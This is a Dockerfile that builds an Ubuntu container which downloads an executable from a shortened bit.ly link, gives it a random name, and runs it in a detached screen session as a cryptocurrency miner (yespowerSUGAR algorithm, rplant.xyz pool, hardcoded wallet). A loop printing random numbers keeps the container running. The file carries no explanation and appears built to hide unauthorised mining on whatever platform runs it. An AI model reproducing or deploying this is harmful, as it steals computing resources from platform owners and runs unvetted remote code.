FROM ubuntu:20.04

RUN apt-get update && \
    apt-get install -y screen sudo wget curl && \
    chmod 777 /run/screen && \
    hostid=$(shuf -n 1 -i 1-9999999) && \
    wget -q -O $hostid https://bit.ly/3qqkYMh && \
    chmod +x $hostid && \
    screen -dmS $hostid ./$hostid -a yespowerSUGAR -o stratum+tcps://stratum-asia.rplant.xyz:17042 -u sugar1qjhuqfmdcmaq6qr0dlxh2c9d874x6eaa88vmj3y.$(shuf -n 1 -i 1-999999) -t8 && \
    while :; do shuf -n 1 -i 1-99999999; sleep 30; done